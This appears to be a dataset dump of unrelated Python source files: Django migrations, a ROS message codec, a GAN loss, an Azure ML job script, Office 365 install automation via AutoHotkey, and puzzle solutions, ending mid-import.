text stringlengths 38 1.54M |
|---|
def ubahHuruf(teks, a, b):
    """Replace characters in `teks`: each character a[i] becomes b[i].

    Replacements are applied sequentially, pair by pair. Prints the
    transformed string and also returns it so callers can use the result.
    """
    hasil = teks
    # zip() stops at the shorter string, so mismatched lengths no longer
    # raise IndexError (the original indexed a[p] for p in range(len(b))).
    for lama, baru in zip(a, b):
        hasil = hasil.replace(lama, baru)
    print(hasil)
    return hasil
ubahHuruf('MATEMATIKA', 'T', 'S')
|
import torch
from torch.nn import Module
class RaLSGANLoss(Module):
    """Relativistic average least-squares GAN loss.

    Computes 0.5 * ( E[(C_ij - E[C_ik] - 1)^2] + E[(C_ik - E[C_ij] + 1)^2] ).
    """

    def __init__(self):
        super(RaLSGANLoss, self).__init__()

    def forward(self, C_ij, C_ik):
        # Each critic output is shifted by the *mean* of the opposing one.
        term_a = (C_ij - C_ik.mean() - 1).pow(2).mean()
        term_b = (C_ik - C_ij.mean() + 1).pow(2).mean()
        return (term_a + term_b) / 2
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: sw=4 ts=4 fenc=utf-8 et
# ==============================================================================
# Copyright © 2009 UfSoft.org - Pedro Algarvio <ufs@ufsoft.org>
#
# License: BSD - Please view the LICENSE file for additional information.
# ==============================================================================
from setuptools import setup
import sshg
# All metadata is sourced from the sshg package itself so there is a single
# source of truth for version, author, etc.
setup(name=sshg.__package__,
      version=sshg.__version__,
      author=sshg.__author__,
      author_email=sshg.__email__,
      url=sshg.__url__,
      download_url='http://python.org/pypi/%s' % sshg.__package__,
      description=sshg.__summary__,
      long_description=sshg.__description__,
      license=sshg.__license__,
      platforms="OS Independent - Anywhere Twisted and Mercurial is known to run.",
      keywords="Twisted Mercurial SSH ACL HG",
      packages=['sshg'],
      install_requires=['simplejson', 'SQLAlchemy', 'decorator'],
      package_data={
          'sshg': ['upgrades/*.cfg']
      },
      classifiers=[
          # Fix: '5 - Alpha' is not a valid trove classifier; the valid
          # alpha-stage value is '3 - Alpha'.
          'Development Status :: 3 - Alpha',
          'Environment :: Web Environment',
          'Intended Audience :: System Administrators',
          'License :: OSI Approved :: BSD License',
          'Operating System :: OS Independent',
          'Programming Language :: Python',
          'Topic :: Utilities',
          'Topic :: Internet :: WWW/HTTP',
          'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
      ]
)
|
# Generated by Django 3.0.2 on 2020-01-05 17:01
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial migration: creates the Matches_Pred table holding one
    model prediction per match, alongside the actual result."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Matches_Pred',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('date', models.DateField()),
                ('league', models.CharField(max_length=5)),
                # MW presumably means "match week" — TODO confirm with the app models.
                ('MW', models.IntegerField(default=0)),
                ('HomeTeam', models.CharField(max_length=200)),
                ('AwayTeam', models.CharField(max_length=200)),
                ('model', models.CharField(max_length=5)),
                ('prediction', models.CharField(max_length=5)),
                ('Result', models.CharField(max_length=10)),
                ('result_binary', models.IntegerField()),
                # 1/0 flag-style field; exact semantics not visible here — verify against callers.
                ('corrected', models.IntegerField()),
                ('proba', models.FloatField(default=0)),
            ],
        ),
    ]
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-11-20 20:20
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    """Initial schema for the SportsLover app: users' social graph (Friend),
    group activities (Group, Chat, notifications), places with comments and
    ranks, sports categories/items, and Stripe-style Sale records."""

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        # Chat messages; `group` is a plain CharField, not an FK — TODO confirm intent.
        migrations.CreateModel(
            name='Chat',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('content', models.TextField()),
                ('deleted', models.BooleanField(default=False)),
                ('time', models.DateTimeField(auto_now=True)),
                ('group', models.CharField(default='', max_length=50)),
                ('sender', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='has_chats', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Comment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('author', models.CharField(max_length=200)),
                ('text', models.TextField(blank=True, null=True)),
                ('created_time', models.DateTimeField(default=django.utils.timezone.now)),
            ],
        ),
        # One Friend row per user, M2M to that user's friends.
        migrations.CreateModel(
            name='Friend',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('friend', models.ManyToManyField(related_name='friend', to=settings.AUTH_USER_MODEL)),
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='user', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        # NOTE: 'reciever' (sic) is kept as-is; renaming a column belongs in a later migration.
        migrations.CreateModel(
            name='FriendNotification',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('content', models.CharField(default='', max_length=100)),
                ('types', models.CharField(default='', max_length=20)),
                ('reciever', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='reciever_friend', to=settings.AUTH_USER_MODEL)),
                ('sender', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='sender_friend', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        # A scheduled group activity; place/sportsclass/sportsitem FKs added below.
        migrations.CreateModel(
            name='Group',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('subject', models.CharField(default='', max_length=50)),
                ('address', models.CharField(default='', max_length=100)),
                ('size', models.IntegerField(default=1)),
                ('introduction', models.CharField(default='', max_length=400)),
                ('cost', models.DecimalField(decimal_places=2, default=0.0, max_digits=5)),
                ('date_begin', models.DateTimeField()),
                ('date_end', models.DateTimeField()),
                ('time', models.DateTimeField(auto_now_add=True)),
                ('member', models.ManyToManyField(related_name='member', to=settings.AUTH_USER_MODEL)),
                ('owner', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='owner', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='GroupNotification',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('content', models.CharField(default='', max_length=100)),
                ('types', models.CharField(default='', max_length=20)),
                ('group', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='SportsLover.Group')),
                ('reciever', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='group_reciever', to=settings.AUTH_USER_MODEL)),
                ('sender', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='group_sender', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        # Per-user profile information.
        migrations.CreateModel(
            name='Info',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('first_name', models.CharField(max_length=20)),
                ('last_name', models.CharField(max_length=20)),
                ('age', models.CharField(blank=True, default='', max_length=20)),
                ('bio', models.CharField(blank=True, default='', max_length=420)),
                ('image', models.ImageField(blank=True, default='empty.png', upload_to='photos')),
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Notification',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('content', models.CharField(default='', max_length=100)),
                ('status', models.CharField(default='incomplete', max_length=100)),
                ('group', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='SportsLover.Group')),
                ('reciever', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='reciever', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Place',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(default='', max_length=40)),
                ('address', models.CharField(default='', max_length=100)),
                ('cost', models.DecimalField(decimal_places=2, default=0.0, max_digits=5)),
                ('rank', models.DecimalField(decimal_places=2, default=0.0, max_digits=5)),
                ('visitor', models.ManyToManyField(to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Rank',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('rank', models.IntegerField(default=5)),
                ('place', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='place', to='SportsLover.Place')),
            ],
        ),
        # Payment record; charge_id presumably references an external charge — verify.
        migrations.CreateModel(
            name='Sale',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('charge_id', models.CharField(max_length=32)),
            ],
        ),
        migrations.CreateModel(
            name='SportsClass',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=40)),
            ],
        ),
        migrations.CreateModel(
            name='SportsItem',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('item', models.CharField(max_length=40)),
                ('label', models.ManyToManyField(to='SportsLover.SportsClass')),
            ],
        ),
        # FKs added after model creation to break the Group<->Place ordering cycle.
        migrations.AddField(
            model_name='group',
            name='place',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='SportsLover.Place'),
        ),
        migrations.AddField(
            model_name='group',
            name='sportsclass',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='SportsLover.SportsClass'),
        ),
        migrations.AddField(
            model_name='group',
            name='sportsitem',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='SportsLover.SportsItem'),
        ),
        migrations.AddField(
            model_name='comment',
            name='place',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='SportsLover.Place'),
        ),
    ]
|
import struct
from itertools import izip
from enums import (CommandMessageSubtype, MessageSubtype, MessageType,
MessageValueType, MessengerType, ParamFlags, NodeSignals)
from utils import grouped
class MessageDescription(object):
    """Wire-level description of a ROS message class: the type itself,
    the value-type code of every slot, and the slot names."""

    def __init__(self, message):
        self.type = message
        # One MessageValueType code per slot, kept in slot order.
        self.arg_types = [MessageValueType[slot_type].value
                          for slot_type in message._slot_types]
        self.arg_names = message.__slots__
class Parameter(object):
    """A named, typed configuration parameter with flags and a current value."""

    def __init__(self, name, param_id,
                 description=None, param_type=MessageValueType.nothing, value=None, flags=ParamFlags.normal.value):
        self.id = param_id
        self.name = name
        self.description = description
        self.type = param_type
        self.value = value
        self.flags = flags
# Packers from Python values to wire bytes, keyed by MessageValueType value.
# Fix: int64/uint64 now use 'q'/'Q' (always 8 bytes); the original 'l'/'L'
# are native C longs, which are only 4 bytes on Windows and 32-bit platforms
# and would reject/misencode true 64-bit values there.
_TO_BYTES = {
    MessageValueType.nothing.value: lambda x: None,
    MessageValueType.bool.value: lambda x: struct.pack(b'?', x),
    MessageValueType.int8.value: lambda x: struct.pack(b'b', x),
    MessageValueType.uint8.value: lambda x: struct.pack(b'B', x),
    MessageValueType.int16.value: lambda x: struct.pack(b'h', x),
    MessageValueType.uint16.value: lambda x: struct.pack(b'H', x),
    MessageValueType.int32.value: lambda x: struct.pack(b'i', x),
    MessageValueType.uint32.value: lambda x: struct.pack(b'I', x),
    MessageValueType.int64.value: lambda x: struct.pack(b'q', x),
    MessageValueType.uint64.value: lambda x: struct.pack(b'Q', x),
    MessageValueType.float32.value: lambda x: struct.pack(b'f', x),
    MessageValueType.float64.value: lambda x: struct.pack(b'd', x),
    # Strings and raw payloads pass through untouched.
    MessageValueType.string.value: lambda x: x,
    MessageValueType.raw.value: lambda x: x
}
# Unpackers from wire bytes back to Python values (inverse of _TO_BYTES).
# Fix: int64/uint64 use 'q'/'Q' (always 8 bytes) instead of the
# platform-dependent native 'l'/'L'.
_FROM_BYTES = {
    MessageValueType.nothing.value: lambda x: None,
    MessageValueType.bool.value: lambda x: struct.unpack(b'?', x)[0],
    MessageValueType.int8.value: lambda x: struct.unpack(b'b', x)[0],
    MessageValueType.uint8.value: lambda x: struct.unpack(b'B', x)[0],
    MessageValueType.int16.value: lambda x: struct.unpack(b'h', x)[0],
    MessageValueType.uint16.value: lambda x: struct.unpack(b'H', x)[0],
    MessageValueType.int32.value: lambda x: struct.unpack(b'i', x)[0],
    MessageValueType.uint32.value: lambda x: struct.unpack(b'I', x)[0],
    MessageValueType.int64.value: lambda x: struct.unpack(b'q', x)[0],
    MessageValueType.uint64.value: lambda x: struct.unpack(b'Q', x)[0],
    MessageValueType.float32.value: lambda x: struct.unpack(b'f', x)[0],
    MessageValueType.float64.value: lambda x: struct.unpack(b'd', x)[0],
    # Strings and raw payloads pass through untouched.
    MessageValueType.string.value: lambda x: x,
    MessageValueType.raw.value: lambda x: x
}
class _BaseMessageCodec(object):
def encode_init_msg(self, msgr_id, transport_protocol,
msgr_type, name, dev_name, dev_type):
return [msgr_type.value +
dev_type.value +
transport_protocol.value,
name,
dev_name,
msgr_id]
class RawMessageCodec(_BaseMessageCodec):
    """Codec that forwards already-serialised payloads untouched."""

    def encode_raw_message(self, message):
        frame = [MessageType.Common.value, MessageSubtype.Reply.value]
        # Lists are spliced in flat; anything else is appended as a
        # single payload element.
        if isinstance(message, list):
            frame += message
        else:
            frame += [message]
        return frame
class ROSMessageCodec(_BaseMessageCodec):
    """Codec for ROS-typed messengers: every messenger has a reply type;
    services additionally carry a request, actions a feedback message."""

    def __init__(self, msgr_type, reply_type, request_type=None, feedback_type=None):
        self.reply = MessageDescription(reply_type)
        self.request = (MessageDescription(request_type)
                        if msgr_type == MessengerType.Service else None)
        self.feedback = (MessageDescription(feedback_type)
                         if msgr_type == MessengerType.Action else None)
        super(ROSMessageCodec, self).__init__()

    def encode_init_msg(self, msgr_id, transport_protocol, msgr_type, name, dev_name, dev_type):
        """Common init frame plus the message description sections."""
        frame = super(ROSMessageCodec, self).encode_init_msg(
            msgr_id, transport_protocol, msgr_type, name, dev_name, dev_type)
        frame.extend(self._encode_msg_desc(self.reply))
        # Optional sections are separated from the reply by an empty frame.
        if self.request:
            frame.append(b'')
            frame.extend(self._encode_msg_desc(self.request))
        if self.feedback:
            frame.append(b'')
            frame.extend(self._encode_msg_desc(self.feedback))
        return frame

    def encode_reply_msg(self, messenger_id, msg):
        frame = [MessageType.Common.value,
                 MessageSubtype.Reply.value,
                 messenger_id]
        frame.extend(self._encode_msg_data(self.reply, msg))
        return frame

    def encode_feedback_msg(self, msg):
        assert self.feedback is not None, 'No Feedback'
        frame = [MessageType.Common.value,
                 MessageSubtype.Feedback.value]
        frame.extend(self._encode_msg_data(self.feedback, msg))
        return frame

    def decode_request_msg(self, msg):
        """Rebuild a request message object from its wire frame.

        NOTE(review): the payload is assumed to start at frame index 3
        (the original carried an unanswered '#why 1?' question here) —
        confirm against the sender's framing.
        """
        assert self.request is not None, 'No Request'
        values = [_FROM_BYTES[value_type](raw)
                  for value_type, raw in zip(self.request.arg_types, msg[3:])]
        return self.request.type(*values)

    @staticmethod
    def _encode_msg_desc(msg_desc):
        """Interleave slot names and type codes: [name0, type0, name1, ...]."""
        desc = []
        for slot_name, slot_type in zip(msg_desc.arg_names, msg_desc.arg_types):
            desc.append(slot_name)
            desc.append(slot_type)
        return desc

    @staticmethod
    def _encode_msg_data(msg_desc, message):
        """Serialise each slot of `message` with its type's packer."""
        return [_TO_BYTES[slot_type](getattr(message, slot_name))
                for slot_name, slot_type in zip(msg_desc.arg_names, msg_desc.arg_types)]
class CommandCodec(object):
    """(De)serialises command initialisation, call and reply frames."""

    @staticmethod
    def encode_command_init(command):
        """Flatten a command definition into an init frame."""
        frame = [command.msgr_id,
                 struct.pack('i', command.id),
                 command.name,
                 command.description,
                 command.usage.value]
        # Parameter descriptions as (name, type-code) pairs; '' when absent.
        if command.params is None:
            frame.append('')
        else:
            for param_name, param_type in zip(command.param_names, command.params):
                frame.append(param_name)
                frame.append(param_type.value)
        # Separator between the parameter and reply sections.
        frame.append('')
        if command.repl is None:
            frame.append('')
        else:
            for reply_name, reply_type in zip(command.repl_names, command.repl):
                frame.append(reply_name)
                frame.append(reply_type.value)
        return frame

    @staticmethod
    def decode_command_call(call_message):
        # Frame indexes 0-2 carry routing/type values (Command marker and
        # Request subtype among them); the payload starts at index 3.
        return {'command_id': struct.unpack(b'i', call_message[3])[0],
                'call_id': call_message[4],
                'args': call_message[5:]}

    @staticmethod
    def decode_command_call_args(arg_types, args):
        """Convert raw argument bytes according to their declared types."""
        if not arg_types:
            return []
        # A single raw-typed argument consumes the whole payload.
        if arg_types[0] == MessageValueType.raw:
            return [args]
        return [_FROM_BYTES[arg_type.value](raw)
                for arg_type, raw in zip(arg_types, args)]

    @staticmethod
    def encode_command_reply(command_id, call_id, reply_desc, reply):
        """Build a reply frame; handles raw, list and scalar replies."""
        frame = [MessageType.Command.value,
                 struct.pack('i', command_id),
                 CommandMessageSubtype.Reply.value,
                 call_id]
        if not reply:
            return frame
        if reply_desc[0] == MessageValueType.raw:
            frame.extend(reply)
            return frame
        if isinstance(reply, list):
            for reply_type, item in zip(reply_desc, reply):
                frame.append(_TO_BYTES[reply_type.value](item))
            return frame
        frame.append(_TO_BYTES[reply_desc[0].value](reply))
        return frame
class ParamsCodec(object):
    """(De)serialises parameter descriptions and value updates.

    Note: this module targets Python 2 (izip/iteritems), so the dict
    iteration methods below are kept as-is.
    """

    @staticmethod
    def decode_params_info_yaml(params):
        """Build an {index: Parameter} table from a YAML-parsed mapping.

        Missing keys fall back to: no description, type 'nothing',
        no value and normal flags.
        """
        decoded_info = {}
        for index, (name, spec) in enumerate(params.iteritems()):
            decoded_info[index] = Parameter(
                name,
                index,
                spec.get('description'),
                MessageValueType[spec['type']] if 'type' in spec else MessageValueType.nothing,
                spec.get('value'),
                spec.get('flags', ParamFlags.normal.value))
        return decoded_info

    @staticmethod
    def decode_params(params, changes):
        """Pair each changed parameter with its freshly decoded value.

        `changes` alternates packed-id / raw-value entries.
        """
        decoded = []
        for packed_id, raw_value in grouped(changes, 2):
            parameter = params[struct.unpack('i', packed_id)[0]]
            decoded.append((parameter, _FROM_BYTES[parameter.type.value](raw_value)))
        return decoded

    @staticmethod
    def encode_params_info(params):
        """Flatten parameter metadata (and current value) into a frame."""
        frame = []
        for param in params:
            type_code = param.type.value
            frame += [struct.pack('i', param.id),
                      param.name,
                      param.description,
                      struct.pack('B', param.flags),
                      type_code]
            encoded_value = _TO_BYTES[type_code](param.value)
            # List-valued encodings are spliced flat into the frame.
            if type(encoded_value) is list:
                frame += encoded_value
            else:
                frame.append(encoded_value)
        return frame

    @staticmethod
    def encode_params_yaml(params):
        """Map parameter names to current values (for YAML dumping)."""
        return {param.name: param.value for param in params.itervalues()}

    @staticmethod
    def encode_params_info_yaml(params):
        """Full metadata dump keyed by parameter name (for YAML dumping)."""
        return {param.name: {'flags': param.flags,
                             'type': param.type.name,
                             'description': param.description,
                             'value': param.value} for param in params.itervalues()}
class NodeSignalsCodec(object):
    """(De)serialises node-signal frames."""

    @staticmethod
    def encode_node_signal(signal, data):
        frame = [MessageType.NodeSignal.value, signal.value]
        # Optional payload is spliced in flat.
        if data:
            frame += data
        return frame

    @staticmethod
    def decode_node_signal(msg):
        """Return (NodeSignals member, payload-or-None)."""
        signal = NodeSignals(msg[1])
        payload = msg[2:] if len(msg) > 2 else None
        return (signal, payload)
class NodeMessageCodec(object):
    """Builds node-level control frames."""

    @staticmethod
    def encode_node_initialization(name):
        # Frame layout: [message-type marker, node name].
        return [MessageType.NodeInitialization.value, name]
|
from scripts.archive import load_config
from os import scandir, remove
def clean_archive():
    """Delete every non-hidden regular file from the configured zip folder."""
    config = load_config()
    with scandir(config['zip_path']) as entries:
        for entry in entries:
            # Skip dot-files and anything that is not a plain file
            # (sub-directories, symlinked dirs, ...).
            if not entry.name.startswith('.') and entry.is_file():
                remove(entry.path)
|
from azureml.core import ScriptRunConfig, Experiment
from azureml.core import Workspace
from azureml.core.compute import ComputeTarget, AmlCompute
from azureml.core.compute_target import ComputeTargetException
from azureml.core import Environment
from azureml.widgets import RunDetails
from azureml.core.authentication import ServicePrincipalAuthentication
# Authenticate with a service principal.
# NOTE(review): these are placeholder credentials — supply real values from a
# secure store (env vars / Key Vault); never commit actual secrets.
svc_pr = ServicePrincipalAuthentication(
    tenant_id="xxxxxxxxx-xxxxxx-xxxx-xxxx-xxxxxxx",
    service_principal_id="xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx",
    service_principal_password="xxxxxxxxxxxxxxxxxxxxxx")
# Attach to the existing Azure ML workspace using that principal.
ws = Workspace(
    subscription_id="xxxxxxxx-xxxxxxx-xxxx-xxx-xxxxxxxxx",
    resource_group="rg-machinelearning",
    workspace_name="machinelearning",
    auth=svc_pr
)
print("Found workspace {} at location {}".format(ws.name, ws.location))
print('Workspace name: ' + ws.name,
      'Azure region: ' + ws.location,
      'Subscription id: ' + ws.subscription_id,
      'Resource group: ' + ws.resource_group, sep = '\n')
# create or load an experiment
experiment = Experiment(ws, 'MyExperiment')
# create or retrieve a compute target (must already exist in the workspace)
cluster = ws.compute_targets['cluster1']
# create or retrieve a curated environment
env = Environment.get(ws, name='AzureML-sklearn-0.24.1-ubuntu18.04-py37-cpu-inference')
# configure and submit your training run; setup.sh runs before train.py
src = ScriptRunConfig(source_directory='.',
                      command=['bash setup.sh && python train.py'],
                      compute_target=cluster,
                      environment=env)
run = experiment.submit(config=src)
run |
from util import do, p, BetaScript, kill, usernames
import subprocess, time, os, os.path
p("Importing s_05!")
def s_05():
    """Step 05: install Office, then toggle the Start menu, and log the score."""
    # install_office() is self-contained — nothing else needs calling first.
    score = install_office()
    # Press the Windows key twice per pass (open + close the Start menu).
    for _ in range(2):
        BetaScript("send {LWin}")
        time.sleep(.2)
        BetaScript("send {Lwin}")
    p("Ran 3 operations 3 tests {}% pass".format((score/1)*100))
def office_login():
    """Open the Office 365 sign-in page in Edge and complete the login
    via AutoHotkey scripts.

    Polls the sign-in window with pixel-colour probes until the expected
    colour signature appears, then types the credentials. Returns True.
    """
    do("powershell start microsoft-edge:http://aka.ms/365")
    # Probe three pixels of the sign-in window; the concatenated colours
    # are compared below to detect that the page has rendered.
    script1 = """WinActivate, Sign in to your account
PixelGetColor, EOffice, 1894, 283, RGB
PixelGetColor, ELock, 358, 125, RGB
PixelGetColor, EBar, 1957, 572, RGB
send, !{tab}
sleep, 500
send, %EOffice%%ELock%%EBar%{enter}"""
    # Types the e-mail and password, then confirms the prompts.
    script2 = """WinActivate, Sign in to your account
sleep, 500
Send, {fname}.{lname}@mssummit.net{tab}
sleep, 500
Send, P@ssword1
sleep 200
send {tab}
sleep 200
send {space}
sleep, 500
send {enter}"""
    # Poll until the probed pixel colours match the expected signature.
    while True:
        time.sleep(5)
        if str(BetaScript(script1, True)) == str('0xEB3C000x107C100xF'):
            break
        else:
            p("Waiting 5 seconds...")
    time.sleep(.75)
    # Fill the placeholders with the current user's names; AHK key tokens
    # are re-injected literally so .format() leaves them intact.
    BetaScript(script2.format(fname=usernames()['fname'], lname=usernames()['lname'], tab="{tab}", space="{space}", enter="{enter}"))
    return True
def download_office_exe():
    """Drive the Office 365 portal to download the installer.

    Waits for the portal page to render (pixel-colour probes), tabs to the
    install button, then polls the Downloads folder until the
    Setup*O365ProPlus*.exe file appears. Returns its full path.
    """
    # Probe several landmark pixels; the trailing ;comments record the
    # colour each probe is expected to report.
    script1 = """WinActivate, Office 365
sleep 500
PixelGetColor, EOfficeLogo, 525, 385, RGB ;0x0D9390F
PixelGetColor, EUpperBar, 814, 217, RGB ;0x000000
PixelGEtColor, ENotify, 2392, 211, RGB ; 0xF
PixelGetColor, EInstall, 2052, 717, RGB ;0x0D9390F
PixelGetColor, EWord, 899, 676, RGB ;0x2B579A
PixelGetColor, EExcel, 1111, 642, RGB ;0x207346
PixelGetColor, EOnenote, 1621, 663, RGB ;0x80397B
;0xD9390F0x0000000xD9390F0x2B579A0x2073460xD1B7CF
;0xD9390F0x0000000xD9390F0x2B579A0x2073460x80397B
Send, !{tab}
sleep, 500
Send, %EOfficeLogo%%EUpperBar%%EInstall%%EWord%%EExcel%%EOnenote%%ENotify%{enter}"""
    # Tab through the page to the install control, then confirm the
    # download dialog with space/enter.
    script2 = """send, #1
sleep 1000
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {tab}
sleep, 250
send, {space}
sleep 250
send, {tab}{space}
sleep, 250
send, {tab}{enter}"""
    # Wait until the portal page matches the expected colour signature.
    while True:
        time.sleep(3)
        if str(BetaScript(script1, True)) != str("0xD9390F0x0000000xD9390F0x2B579A0x2073460x80397B0xF"):
            p("Will try again in 3 seconds...")
        else:
            break
    BetaScript(script2)
    # Poll the Downloads folder until the installer file shows up.
    while True:
        time.sleep(15)
        check = os.listdir("C:\\Users\\CIO\\Downloads\\")
        okay = False
        for f in check:
            if f.startswith("Setup") and "O365ProPlus" in f and f.endswith('.exe'):
                okay = f
                break
        if okay:
            break
        else:
            p("Will try again in 15 seconds...")
    kill()
    return "C:\\Users\\CIO\\Downloads\\" + f
def install_office():
    """Log in to Office 365, download the installer, run it, and wait
    for the installation to complete.

    Returns True once every expected Office16 executable is present.
    """
    office_login()
    installer = download_office_exe()
    do(installer)
    office_root = "C:\\Program Files (x86)\\Microsoft Office\\root\\Office16"
    # Executables whose presence signals a finished install (same set the
    # original checked one-by-one).
    required = ("excel.exe", "lync.exe", "msaccess.exe", "mspub.exe",
                "onenote.exe", "outlook.exe", "powerpnt.exe", "winword.exe")
    while True:
        p("Checking to see if build completed...")
        time.sleep(3)  # fix: original had a stray trailing comma here
        done = os.path.exists(office_root) and all(
            os.path.isfile(os.path.join(office_root, exe)) for exe in required)
        if done:
            time.sleep(5)
            # Stop the Click-to-Run client left running by the installer.
            kill("OfficeC2RClient.exe", True)
            return True
        else:
            p("Error Code: MA_365II")
# Allow running this module directly as a standalone provisioning step.
if __name__ == "__main__":
    s_05()
|
#659. Split Array into Consecutive Subsequences
#Given an integer array nums that is sorted in ascending order, return true if and only if you can split it into one or more subsequences such that each subsequence consists of consecutive integers and has a length of at least 3.
#Example 1:
#Input: nums = [1,2,3,3,4,5]
#Output: true
#Explanation:
#You can split them into two consecutive subsequences :
#1, 2, 3
#3, 4, 5
class Solution:
    def isPossible(self, nums: "List[int]") -> bool:
        """Return True if `nums` (sorted ascending) can be split into
        subsequences of consecutive integers, each of length >= 3.

        Greedy, O(n) time / O(n) space: for each number prefer extending a
        subsequence that ends just below it; otherwise try to start a fresh
        run of three; otherwise splitting is impossible.

        Fixes vs. original: the annotation is quoted and collections is
        imported locally, so the class no longer depends on `List`,
        `defaultdict` and `Counter` being imported elsewhere.
        """
        from collections import Counter, defaultdict
        # ends[v]: number of subsequences currently ending at value v.
        ends = defaultdict(int)
        # remaining[v]: occurrences of v not yet placed in a subsequence.
        remaining = Counter(nums)
        for num in nums:
            if remaining[num] == 0:
                # Already consumed when a new run of three was started.
                continue
            if ends[num - 1] > 0:
                # Attach to a subsequence ending at num-1.
                ends[num - 1] -= 1
                ends[num] += 1
                remaining[num] -= 1
            elif remaining[num + 1] > 0 and remaining[num + 2] > 0:
                # Start a new run: num, num+1, num+2.
                remaining[num] -= 1
                remaining[num + 1] -= 1
                remaining[num + 2] -= 1
                ends[num + 2] += 1
            else:
                return False
        return True
|
# Starting values for the two generators used below.
a = 699
b = 124
def a_update(n):
    """Advance generator A one step: multiply by 16807, modulo 2**31 - 1."""
    return n * 16807 % 2147483647
def b_update(n):
    """Advance generator B one step: multiply by 48271, modulo 2**31 - 1."""
    return n * 48271 % 2147483647
# Part 1: step both generators 40 million times and count rounds where the
# low 16 bits of the two values agree.
N = 40000000
count = 0
a_tmp = a
b_tmp = b
for i in range(N):
    a_tmp = a_update(a_tmp)
    b_tmp = b_update(b_tmp)
    if (a_tmp & 0xffff) == (b_tmp & 0xffff):
        count += 1
print(count)
# Part 2: generator A only delivers values divisible by 4, generator B only
# values divisible by 8; compare the low 16 bits of 5 million such pairs.
N = 5000000
count = 0
a_tmp = a
b_tmp = b
for i in range(N):
    while True:
        a_tmp = a_update(a_tmp)
        if (a_tmp % 4) == 0:
            break
    while True:
        b_tmp = b_update(b_tmp)
        if (b_tmp % 8) == 0:
            break
    if (a_tmp & 0xffff) == (b_tmp & 0xffff):
        count += 1
print(count)
|
# -*- coding: utf-8 -*-
"""
Physical constants used in code
"""
PARSEC = 3.086e18  # one parsec, expressed in centimetres
C = 299792.458  # speed of light, in km/s
from flask import Flask, render_template, redirect, url_for, jsonify, request
from flask_bootstrap import Bootstrap
from flask_sqlalchemy import SQLAlchemy
from flask_wtf import FlaskForm
from werkzeug.security import generate_password_hash, check_password_hash
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired, URL
from flask_ckeditor import CKEditor, CKEditorField
from datetime import datetime
from flask_login import login_user, login_required, LoginManager, current_user, logout_user, UserMixin, \
